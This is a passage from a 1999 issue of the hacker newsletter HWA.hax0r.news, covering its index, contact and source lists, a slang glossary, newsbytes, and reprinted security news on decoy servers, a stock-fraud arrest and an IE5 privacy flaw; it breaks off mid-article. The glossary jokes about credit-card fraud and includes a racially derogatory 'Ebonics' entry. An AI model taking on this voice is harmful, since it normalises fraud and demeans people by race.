-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                        <=-[ HWA.hax0r.news ]-=>                        =
==========================================================================
[=HWA'99=]             Number 15 Volume 1             1999 April 25 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

        "Silly hacker, root is for administrators" - Project Gamma

Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (remember i'm doing this for
me, not you, the fact some people happen to get a kick/use out of it is of
secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor
could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info. It's a labour of
love and will be continued for as long as I feel like it, i'm not motivated
by dollars or the illusion of fame, did you ever notice how the most
famous/infamous hackers are the ones that get caught? there's a lot to be
said for remaining just outside the circle... <g>

@HWA

=-----------------------------------------------------------------------=

                      Welcome to HWA.hax0r.news ...
#15

=-----------------------------------------------------------------------=

 *******************************************************************
 ***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
 ***                                                             ***
 ***  please join to discuss or impart news on techno/phac scene ***
 ***  stuff or just to hang out ... someone is usually around 24/7***
 ***                                                             ***
 ***  Note that the channel isn't there to entertain you its for ***
 ***  you to talk to us and impart news, if you're looking for fun***
 ***  then do NOT join our channel try #weirdwigs or something... ***
 ***  we're not #chatzone or #hack                                ***
 ***                                                             ***
 *******************************************************************

=-------------------------------------------------------------------------=

 Issue #15

=--------------------------------------------------------------------------=
 [ INDEX ]
=--------------------------------------------------------------------------=
 Key     Content
=--------------------------------------------------------------------------=

 00.0 .. COPYRIGHTS ......................................................
 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
 00.2 .. SOURCES .........................................................
 00.3 .. THIS IS WHO WE ARE ..............................................
 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
 00.5 .. THE HWA_FAQ V1.0 ................................................

 01.0 .. GREETS ..........................................................
 01.1 .. Last minute stuff, rumours, newsbytes ...........................
 01.2 .. Mailbag .........................................................
 02.0 .. From the Editor..................................................
 03.0 .. Walls and security decoys........................................
 04.0 .. Securities fraud man released on $50,000 bond....................
 05.0 .. Another privacy hole in MSIE 5.0 ................................
 06.0 .. High tech on the battlefield.....................................
 07.0 .. Hotmail has similar vulnerability to last week's rocketmail advisory
 08.0 .. Vulnerability in MacPerl CGI ....................................
 09.0 .. The Adobe Acrobat NetBus scare thread;...........................
 10.0 .. Crackpipe.c bypasses any firewalls via tunneling (linux).........
 11.0 .. Unix rshd and rsh/rpc vulnerabilities in WindowsNT...............
 12.0 .. Are your IT professionals on Drugs?..............................
 13.0 .. Rand corporation releases a paper on Cyber Terrorism.............
 14.0 .. FAA to implement CAPS............................................
 15.0 .. The Ebayla Hack..................................................
 16.0 .. Cool security in Dutch PTT site allows users to send anonymous spam
 17.0 .. Cold Fusion vulnerability, thousands of sites exposed to danger.
 18.0 .. Privacy at risk in e-commerce rush ..............................
 18.1 .. CC numbers left vulnerable by many shopping cart programs........
 18.2 .. E-tailers scramble to fix security holes.........................
 19.0 .. Got lots of time and computing power on your hands?..............
 20.0 .. EU and US disagree on privacy laws...............................
 21.0 .. Compuserve in court over slander charges.........................
 22.0 .. Cyberwar and Netwar..............................................
 23.0 .. IT Managers push for better online security......................
 24.0 .. Popular Mechanics article "Hackers:America's real threat".....FUD
 25.0 .. URL bug in AIM creates a DoS ....................................
 26.0 .. Shutting up Cell Phones..........................................
 27.0 .. Interview with Aleph1............................................
 28.0 .. World Wide Wangle cmp net techweb article (FUD)..................
 29.0 .. Microsoft DHTML patch advisory...................................
 30.0 .. Microsoft MSIE4 and 5 vulnerabilities patch advisory.............
 31.0 .. [ISN] DoD considers disconnecting from the net because of attacks.
 32.0 .. [ISN] Digital Dicks..............................................
 33.0 .. [ISN] Spooktech99................................................
 34.0 .. [ISN] review:"Ethical and Social Issues in the Information Age",..
 35.0 .. [ISN] Update your AV software!, CIH virus to hit April 26th......
 36.0 .. [ISN] More online store problems.................................
 37.0 .. Mitnick Documents exposed........................................
 38.0 .. New LPR package (linux)..........................................
 39.0 .. New PROCMAIL package (linux) ....................................
 40.0 .. Final call for papers for CQRE (Secure)..........................
 41.0 .. Anyboard WWW vulnerability.......................................
 42.0 .. Egroups bug......................................................
 43.0 .. [ISN] Ok lets see some I.D (Biometrics)..........................
 44.0 .. Javascript hotmail password trap ................................
 45.0 .. Discus web based discussion software advisory....................

=--------------------------------------------------------------------------=

 AD.S .. Post your site ads or etc here, if you can offer something in return
         thats tres cool, if not we'll consider ur ad anyways so send it in.
         ads for other zines are ok too btw just mention us in yours, please
         remember to include links and an email contact. Corporate ads will
         be considered also and if your company wishes to donate to or
         participate in the upcoming Canc0n99 event send in your suggestions
         and ads now...n.b date and time may be pushed back join mailing
         list for up to date information...................................
         Current dates: Aug19th-22nd Niagara Falls... .....................

 HA.HA .. Humour and puzzles .............................................
          Hey You!........................................................
          =------=........................................................
          Send in humour for this section! I need a laugh and its hard to
          find good stuff... ;)...........................................

 HOW.TO .. "How to hack" by our illustrious editor.........................
 SITE.1 .. Featured site, .................................................
 H.W    .. Hacked Websites ................................................
 A.0    .. APPENDICES......................................................
 A.1    .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

 @HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
     THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
     RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
     IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
     (SEE FAQ).

     Important semi-legalese and license to redistribute:

     YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
     GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
     Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
     ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
     http://welcome.to/HWA.hax0r.news

     IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
     NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME
     PRIVATELY current email cruciphux@dok.org

     THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
     ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
     AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

     I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
     REDISTRIBUTE/MIRROR. - EoD

     Although this file and all future issues are now copyright, some of
     the content holds its own copyright and these are printed and
     respected.
     News is news so i'll print any and all news but will quote sources when
     the source is known, if its good enough for CNN its good enough for me.
     And i'm doing it for free on my own time so pfffft. :)

     No monies are made or sought through the distribution of this material.
     If you have a problem or concern email me and we'll discuss it.

     cruciphux@dok.org

     Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
     Canada / North America (hell even if you are inside ..) and wish to
     send printed matter like newspaper clippings a subscription to your
     cool foreign hacking zine or photos, small non-explosive packages or
     sensitive information etc etc well, now you can. (w00t) please no more
     inflatable sheep or plastic dog droppings, or fake vomit thanks.

     Send all goodies to:

     HWA NEWS
     P.O BOX 44118
     370 MAIN ST. NORTH
     BRAMPTON, ONTARIO
     CANADA
     L6V 4H5

     WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
     ~~~~~~~  are reading this from some interesting places, make my day and
              get a mention in the zine, send in a postcard, I realize that
              some places it is cost prohibitive but if you have the time and
              money be a cool dude / gal and send a poor guy a postcard
              preferably one that has some scenery from your place of
              residence for my collection, I collect stamps too so you kill
              two birds with one stone by being cool and mailing in a
              postcard, return address not necessary, just a "hey guys being
              cool in Bahrain, take it easy" will do ... ;-) thanx.

     Ideas for interesting 'stuff' to send in apart from news:

     - Photo copies of old system manual front pages (optionally signed by
       you) ;-)
     - Photos of yourself, your mom, sister, dog and or cat in a NON
       compromising position plz I don't want pr0n. <g>
     - Picture postcards
     - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
       tapes with hack/security related archives, logs, irc logs etc on em.
     - audio or video cassettes of yourself/others etc of interesting phone
       fun or social engineering examples or transcripts thereof.

     If you still can't think of anything you're probably not that
     interesting a person after all so don't worry about it <BeG>

     Our current email:

     Submissions/zine gossip.....: hwa@press.usmc.net
     Private email to editor.....: cruciphux@dok.org
     Distribution/Website........: sas72@usa.net

     @HWA

00.2 Sources ***
     ~~~~~~~~~~~

     Sources can be some, all, or none of the following (by no means
     complete nor listed in any degree of importance) Unless otherwise
     noted, like msgs from lists or news from other sites, articles and
     information is compiled and or sourced by Cruciphux no copyright
     claimed.

     HiR:Hackers Information Report... http://axon.jccc.net/hir/
     News & I/O zine ................. http://www.antionline.com/
     Back Orifice/cDc..................http://www.cultdeadcow.com/
     News site (HNN) .....,............http://www.hackernews.com/
     Help Net Security.................http://net-security.org/
     News,Advisories,++ ...............http://www.l0pht.com/
     NewsTrolls (HNN)..................http://www.newstrolls.com/
     News + Exploit archive ...........http://www.rootshell.com/beta/news.html
     CuD ..............................http://www.soci.niu.edu/~cudigest
     News site+........................http://www.zdnet.com/
     News site+........................http://www.gammaforce.org/
     News site+........................http://www.projectgamma.com/
     News site+........................http://securityhole.8m.com/

     +Various mailing lists and some newsgroups, such as ...
     +other sites available on the HNN affiliates page, please see
      http://www.hackernews.com/affiliates.html as they seem to be popping
      up rather frequently ...

     http://www.the-project.org/ .. IRC list/admin archives
     http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

     alt.hackers.malicious
     alt.hackers
     alt.2600
     BUGTRAQ
     ISN security mailing list
     ntbugtraq
     <+others>

     NEWS Agencies, News search engines etc:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     http://www.cnn.com/SEARCH/
     http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
     http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
     http://www.ottawacitizen.com/business/
     http://search.yahoo.com.sg/search/news_sg?p=hack
     http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
     http://www.zdnet.com/zdtv/cybercrime/
     http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

     NOTE: See appendices for details on other links.

     http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
     http://freespeech.org/eua/ Electronic Underground Affiliation
     http://ech0.cjb.net ech0 Security
     http://net-security.org Net Security

     ...

     Submissions/Hints/Tips/Etc
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

     All submissions that are `published' are printed with the credits you
     provide, if no response is received by a week or two it is assumed that
     you don't care whether the article/email is to be used in an issue or
     not and may be used at my discretion.

     Looking for:

     Good news sites that are not already listed here OR on the HNN
     affiliates page at http://www.hackernews.com/affiliates.html

     Magazines (complete or just the articles) of breaking sekurity or
     hacker activity in your region, this includes telephone phraud and
     any other technological use, abuse hole or cool thingy. ;-) cut em out
     and send it to the drop box.

     - Ed

     Mailing List Subscription Info   (Far from complete)   Feb 1999
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~   ~~~~~~~~

     ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

     THE MOST READ:

     BUGTRAQ - Subscription info
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

     What is Bugtraq?

     Bugtraq is a full-disclosure UNIX security mailing list, (see the
     info file) started by Scott Chasin <chasin@crimelab.com>. To subscribe
     to bugtraq, send mail to listserv@netspace.org containing the message
     body subscribe bugtraq. I've been archiving this list on the web since
     late 1993. It is searchable with glimpse and archived on-the-fly with
     hypermail.
     Searchable Hypermail Index;
     http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

     About the Bugtraq mailing list
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     The following comes from Bugtraq's info file:

     This list is for *detailed* discussion of UNIX security holes: what
     they are, how to exploit, and what to do to fix them.

     This list is not intended to be about cracking systems or exploiting
     their vulnerabilities. It is about defining, recognizing, and
     preventing use of security holes and risks.

     Please refrain from posting one-line messages or messages that do not
     contain any substance that can relate to this list`s charter.

     I will allow certain informational posts regarding updates to security
     tools, documents, etc. But I will not tolerate any unnecessary or
     nonessential "noise" on this list.

     Please follow the below guidelines on what kind of information should
     be posted to the Bugtraq list:

     + Information on Unix related security holes/backdoors (past and present)
     + Exploit programs, scripts or detailed processes about the above
     + Patches, workarounds, fixes
     + Announcements, advisories or warnings
     + Ideas, future plans or current works dealing with Unix security
     + Information material regarding vendor contacts and procedures
     + Individual experiences in dealing with above vendors or security
       organizations
     + Incident advisories or informational reporting

     Any non-essential replies should not be directed to the list but to
     the originator of the message. Please do not "CC" the bugtraq reflector
     address if the response does not meet the above criteria.

     Remember: YOYOW. You own your own words. This means that you are
     responsible for the words that you post on this list and that
     reproduction of those words without your permission in any medium
     outside the distribution of this list may be challenged by you, the
     author.
     For questions or comments, please mail me:
     chasin@crimelab.com (Scott Chasin)

     Crypto-Gram
     ~~~~~~~~~~~

     CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
     insights, and commentaries on cryptography and computer security.

     To subscribe, visit http://www.counterpane.com/crypto-gram.html or send
     a blank message to crypto-gram-subscribe@chaparraltree.com. To
     unsubscribe, visit http://www.counterpane.com/unsubform.html. Back
     issues are available on http://www.counterpane.com.

     CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
     Counterpane Systems, the author of "Applied Cryptography," and an
     inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on
     the board of the International Association for Cryptologic Research,
     EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

     CUD Computer Underground Digest
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     This info directly from their latest ish:

     Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                                    ISSN  1004-042X

            Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
            News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
            Archivist: Brendan Kehoe
            Poof Reader:   Etaion Shrdlu, Jr.
            Shadow-Archivists: Dan Carosone / Paul Southworth
                               Ralph Sims / Jyrki Kuoppala
                               Ian Dickinson
            Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

     [ISN] Security list
     ~~~~~~~~~~~~~~~~~~~

     This is a low volume list with lots of informative articles, if I had
     my way i'd reproduce them ALL here, well almost all .... ;-) - Ed

     Subscribe: mail majordomo@repsec.com with "subscribe isn".
     @HWA

00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

     Some HWA members and Legacy staff
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     cruciphux@dok.org.........: currently active/editorial
     darkshadez@ThePentagon.com: currently active/man in black
     fprophet@dok.org..........: currently active/IRC+ man in black
     sas72@usa.net ............. currently active/IRC+ distribution
     vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
     dicentra...(email withheld): IRC+ grrl in black

     Foreign Correspondants/affiliate members
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     ATTENTION: All foreign correspondants please check in or be removed by
     next issue I need your current emails since contact info was recently
     lost in a HD mishap and i'm not carrying any deadweight. Plus we need
     more people sending in info, my apologies for not getting back to you
     if you sent in January I lost it, please resend.

     N0Portz ..........................: Australia
     Qubik ............................: United Kingdom
     system error .....................: Indonesia
     Wile (wile coyote) ...............: Japan/the East
     Ruffneck .........................: Netherlands/Holland

     And unofficially yet contributing too much to ignore ;)

     Spikeman .........................: World media

     Please send in your sites for inclusion here if you haven't already
     also if you want your emails listed send me a note ... - Ed

     http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
     http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

     *******************************************************************
     ***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
     *******************************************************************

     :-p

     1. We do NOT work for the government in any shape or form. Unless you
        count paying taxes ... in which case we work for the gov't in a
        BIG WAY. :-/

     2. MOSTLY Unchanged since issue #1, although issues are a digest of
        recent news events its a good idea to check out issue #1 at least
        and possibly also the Xmas issue for a good feel of what we're all
        about otherwise enjoy - Ed ...

     @HWA

00.4 Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pidgeon holed with those 'dumb leet
     (l33t?) dewds' <see article in issue #4> this is the state of affairs.
     It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers,
     i'd highly recommend you get that book. Its almost like buying a clue.

     Anyway..on with the show .. - Editorial staff

     @HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Also released in issue #3. (revised) check that issue for the faq it
     won't be reprinted unless changed in a big way with the exception of
     the following excerpt from the FAQ, included to assist first time
     readers:

     Some of the stuff related to personal useage and use in this zine are
     listed below: Some are very useful, others attempt to deny the any
     possible attempts at eschewing obfuscation by obscuring their actual
     definitions.

     @HWA     - see EoA ;-)

     !=       - Mathematical notation "is not equal to" or "does not equal"
                ASC(247) "wavey equals" sign means "almost equal" to. If
                written an =/= (equals sign with a slash thru it) also means
                !=, =< is Equal to or less than and => is equal to or greater
                than (etc, this aint fucking grade school, cripes, don't
                believe I just typed all that..)
     AAM      - Ask a minor (someone under age of adulthood, usually <16, <18
                or <21)

     AOL      - A great deal of people that got ripped off for net access by
                a huge clueless isp with sekurity that you can drive buses
                through, we're not talking Kung-Fu being none too good here,
                Buy-A-Kloo maybe at the least they could try leasing one??

     *CC      - 1 - Credit Card (as in phraud)
                2 - .cc is COCOS (Keeling) ISLANDS but they probably accept
                    cc's

     CCC      - Chaos Computer Club (Germany)

     *CON     - Conference, a place hackers crackers and hax0rs among others
                go to swap ideas, get drunk, swap new mad inphoz, get drunk,
                swap gear, get drunk watch videos and seminars, get drunk,
                listen to speakers, and last but not least, get drunk.

     *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
                    hacker speak he's the guy that breaks into systems and is
                    often (but by no means always) a "script kiddie" see
                    pheer
                2 . An edible biscuit usually crappy tasting without a nice
                    dip, I like jalapeno pepper dip or chives sour cream and
                    onion, yum - Ed

     Ebonics  - speaking like a rastafarian or hip dude of colour <sic> also
                wigger Vanilla Ice is a wigger, The Beastie Boys and rappers
                speak using ebonics, speaking in a dark tongue ... being
                ereet, see pheer

     EoC      - End of Commentary

     EoA      - End of Article or more commonly @HWA

     EoF      - End of file

     EoD      - End of diatribe (AOL'ers: look it up)

     FUD      - Coined by Unknown and made famous by HNN <g> - "Fear
                uncertainty and doubt", usually in general media articles
                not high brow articles such as ours or other HNN affiliates ;)

     du0d     - a small furry animal that scurries over keyboards causing
                people to type weird crap on irc, hence when someone says
                something stupid or off topic 'du0d wtf are you talkin
                about' may be used.

     *HACKER  - Read Stephen Levy's HACKERS for the true definition, then
                see HAX0R

     *HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker,
                    this is difficult to define, I think it is best defined
                    as pop culture's view on The Hacker ala movies such as
                    well erhm "Hackers" and The Net etc... usually used by
                    "real" hackers or crackers in a derogatory or slang
                    humorous way, like 'hax0r me some coffee?' or can you
                    hax0r some bread on the way to the table please?'
                2 - A tool for cutting sheet metal.

     HHN      - Maybe a bit confusing with HNN but we did spring to life
                around the same time too, HWA Hax0r News.... HHN is a part
                of HNN .. and HNN as a proper noun means the hackernews site
                proper. k? k. ;&

     HNN      - Hacker News Network and its affiliates
                http://www.hackernews.com/affiliates.html

     J00      - "you"(as in j00 are OWN3D du0d) - see 0wn3d

     MFI/MOI  - Missing on/from IRC

     NFC      - Depends on context: No Further Comment or No Fucking Comment

     NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

     NFW      - No fuckin'way

     *0WN3D   - You are cracked and owned by an elite entity see pheer

     *OFCS    - Oh for christ's sakes

     PHACV    - And variations of same <coff>
                Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups
                Virus, Warfare

                Alternates: H - hacking, hacktivist
                            C - Cracking <software>
                            C - Cracking <systems hacking>
                            V - Virus
                            W - Warfare <cyberwarfare usually as in Jihad>
                            A - Anarchy (explosives etc, Jolly Roger's
                                Cookbook etc)
                            P - Phreaking, "telephone hacking" PHone fREAKs ...
                            CT - Cyber Terrorism

     *PHEER   - This is what you do when an ereet or elite person is in your
                presence see 0wn3d

     *RTFM    - Read the fucking manual - not always applicable since some
                manuals are pure shit but if the answer you seek is indeed
                in the manual then you should have RTFM you dumb ass.

     TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0

     TBA      - To Be Arranged/To Be Announced also 2ba

     TFS      - Tough fucking shit.

     *w00t    - 1 - Reserved for the uber ereet, noone can say this without
                    severe repercussions from the underground masses. also
                    "w00ten" <sic>
                2 - Cruciphux and sAs72's second favourite word (they're
                    both shit stirrers)

     *wtf     - what the fuck

     *ZEN     - The state you reach when you *think* you know everything
                (but really don't) usually shortly after reaching the ZEN
                like state something will break that you just 'fixed' or
                tweaked.

     @HWA

     -=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.

     * all the people who sent in cool emails and support

     FProphet
     Pyra
     TwstdPair
     _NeM_
     D----Y
     Kevin Mitnick (watch yer back)
     Dicentra
     vexxation
     sAs72
     Spikeman

     and the #innerpulse, #hns crew and some inhabitants of #leetchans ....
     although I use the term 'leet loosely these days, <k0ff><snicker> ;)

     kewl sites:

     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.genocide2600.com/
     + http://www.genocide2600.com/~spikeman/
     + http://www.genocide2600.com/~tattooman/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/

     @HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     "What is popular isn't always right, and what is right isn't always
      popular..."
                          - FProphet '99

     +++ When was the last time you backed up your important data?
++ April 24th today many websites including the net-security, 403-security and other sites redirected traffic to a strike site protesting HiNet's monopoly and high pricing for internet access in Croatia (.hr) so if you couldn't access a specific croatian site on the 24th this internet protest was likely your reason...for more info try accessing http://www.cwl.voyager.hr/dosta/eng/index.html the main strike info site. "Who are we? We live in Croatia. We live on the Internet. We earn our living at the Internet. We work on the Internet. We are the internet. We pay for the privilege of our participation on the Internet, dearly, to the Croatian ISPs, every month, without exception. We are being taken for granted. We are being exploited, because we have no choice, because we need the Internet and we can�t manage without it. We've had ENOUGH!" ++ www.innerpulse.com was not hacked according to Project Gamma who talked to Siko and was told it was hosting problems (as we encountered on our mirror site at cubesoft), anyway the site can be accessed via this ip/url: http://209.54.234.96/ (ed's note: our site came back online but we could still not access our account as of this writing - Ed) ++ Excellent paper on Simulating Cyberwar and Defences http://all.net/journal/ntb/simulate/simulate.html ++ From www.net-security.org WINDOWS 2000 BETA 3 by deepcase, Tuesday 20th Apr 1999 on 12:01 pm CET As Microsoft promised on CeBit 99 the Beta 3 of Windows 2000 is now available for the public. The Beta 3 with Professional and Server version can be orderd for about 50$. This package called "Corporate Preview" includes a 3 month support. Microsoft said that Beta 3 will be out due next week ... ++ From www.net-security.org VIRGIN NET SUES CUSTOMER by BHZ, Wednesday 21st Apr 1999 on 11:48 am CET After having its e-mail briefly boycotted by a spam-defense network, British Internet service provider Virgin Net is suing a former subscriber for sending spam from its network. 
   The spammer's activity resulted in the company being put briefly on the
   Realtime Blackhole List (RBL), an Internet e-mail boycotting tool. The
   damage to Virgin's reputation prompted the company to sue the alleged
   spammer for breach of the terms and conditions of the Virgin Net customer
   contract.

   Read whole story on Wired.
   http://www.wired.com/news/news/technology/story/19224.html

Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

No emails fit for inclusion in the newsletter this week!

================================================================

@HWA

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>
/* #include <thoughts.h>   -- the editor's joke headers; they don't exist, */
/* #include <backup.h>        so they are commented out to let this compile */

int main(void)
{
    printf ("Read commented source!\n\n");
    /*
     * Well this is issue #15, I didn't have time to html'ize the whole ish
     * and am considering goin back to a text-only mode since it takes a lot
     * of time to edit in the links for the html version, anyway here it is,
     * have at it....
     *
     *                                                           - Ed
     */
    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main
address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can
go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to
cruciphux@dok.org

danke.

C*:.

@HWA

03.0 Walls and security decoys
~~~~~~~~~~~~~~~~~~~~~~~~~~

from CMP techweb
http://www.techweb.com/wire/story/TWB19990416S0024

Technology News

Walls And Decoys Safeguard Servers
(04/16/99, 5:35 p.m. ET)
By Rutrell Yasin, InternetWeek

Two network security vendors are taking different approaches to help IT
managers protect corporate servers from network-based attacks.
One approach builds a wall around Windows NT servers, safeguarding critical
applications and data; the other lures potential snoopers to a decoy server,
catching them in the act.

Network-1 Security Solutions Inc. recently unveiled CyberWallPlus-SV,
server-based software that protects Windows NT servers from internal and
external attacks. Meanwhile, Network Associates Inc. unveiled CyberCop Sting,
a decoy server that traces and tracks hackers who attempt to break into
computer systems.

CyberWallPlus-SV adds security functions not found in Windows NT such as
stateful packet inspection, protocol and address filtering as well as network
intrusion detection and audit logging, said Al McGuire, an information
security consultant at Network-1.

Mark Edwards, an analyst at the NTShop consultancy who tested CyberWallPlus-SV,
said the software is in a position to intercept traffic before NT has a chance
to see it because it works in the kernel of the operating system.

The server software also provides a level of intrusion detection not found in
firewalls. For example, firewalls prevent ping-of-death or denial-of-service
attacks by blocking the ping from coming through the firewall. However, IT
departments may have a need to let some pings through, Edwards said.
CyberWallPlus-SV examines the ping for attack signatures and either blocks it
or shuts down the originating IP address until an administrator can determine
whether to let the ping through, he said.

The software is available now. Pricing starts at $1,995.

While CyberWallPlus-SV keeps the bad guys out of the server, Network
Associates' CyberCop Sting works to trap them. The decoy server operates by
placing fictitious data on a server that has low security protection but
sophisticated monitoring technology.

Chris Ward, a security manager at Pagemart, a provider of wireless messaging
services and user of NAI tools, said a decoy server is an interesting concept.
"The trick is to deploy it so only a few people in the company know it's
there. A skilled employee could avoid such a system," he said.

"Last week, we walked a systems administrator out the door because he hacked
into other systems. CyberCop would be fascinating to play with, but I don't
know how useful it will be," Ward said.

@HWA

04.0 Securities fraud man released on $50,000 bail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

SECURITY FRAUD
by BHZ, Saturday 17th Apr 1999 on 3:59 pm CET

An employee of California-based PairGain Technology Inc. was arrested today in
North Carolina on federal charges of fabricating a Bloomberg news service
report and posting it on the Internet, driving up the company's stock. The FBI
arrested Gary Dale Hoke, 25, at his Raleigh, N.C., home on charges of
securities fraud for allegedly disseminating false information about the
company, whose stock is publicly traded, the U.S. attorney's office in Los
Angeles said. Hoke was arraigned in North Carolina, ordered to report to
California at an unspecified date and released on $50,000 bond, said Assistant
U.S. Attorney Christopher Painter.

@HWA

05.0 Another privacy hole in MSIE 5.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Another Privacy Hole in IE 5.0?
by Chris Oakes
3:00 a.m. 16.Apr.99.PDT

An obscure feature in Microsoft's Internet Explorer 5.0 Web browser informs
Web sites when users bookmark their pages.

The feature was discovered during an audit of Wired Digital server logs by
software development manager Kevin Cooke and confirmed Thursday by Wired News.

Microsoft called the privacy implications "unfortunate" and said it is
evaluating changes to future releases of the browser to address the issue.

"This is one of those things where we did not see the privacy issue when we
